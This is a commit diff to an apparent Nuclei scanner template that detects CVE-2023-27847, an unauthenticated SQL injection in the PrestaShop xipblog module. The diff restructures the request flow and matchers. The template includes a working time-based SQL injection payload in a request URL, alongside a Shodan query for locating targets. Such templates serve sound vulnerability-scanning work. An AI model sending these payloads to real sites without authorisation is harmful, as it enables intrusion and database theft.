Update CVE-2023-27847
parent
96ca8aa4ad
commit
dfe475596a
|
@ -25,6 +25,10 @@ info:
|
|||
shodan-query: http.component:"Prestashop"
|
||||
tags: cve,cve2023,prestashop,sqli,unauth,xipblog
|
||||
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
|
@ -32,7 +36,17 @@ http:
|
|||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "xipblog")'
|
||||
condition: and
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1
|
||||
|
@ -63,21 +77,18 @@ http:
|
|||
- type: dsl
|
||||
name: time-based
|
||||
dsl:
|
||||
- 'duration_2>=5'
|
||||
- 'status_code_1 == 200 && contains(body_1, "xipblog")'
|
||||
- 'duration_1>=5'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
name: blind-based
|
||||
dsl:
|
||||
- 'status_code_1 == 200 && contains(body_1, "xipblog")'
|
||||
- 'contains(body_3, "kr_blog_post_area")'
|
||||
- '!contains(body_4, "kr_blog_post_area")'
|
||||
- 'contains(body_2, "kr_blog_post_area")'
|
||||
- '!contains(body_3, "kr_blog_post_area")'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
name: union-based
|
||||
dsl:
|
||||
- 'status_code_1 == 200 && contains(body_1, "xipblog")'
|
||||
- 'contains(body_5, "c8c605999f3d8352d7bb792cf3fdb25b")'
|
||||
- 'contains(body_4, "c8c605999f3d8352d7bb792cf3fdb25b")'
|
||||
condition: and
|
Loading…
Reference in New Issue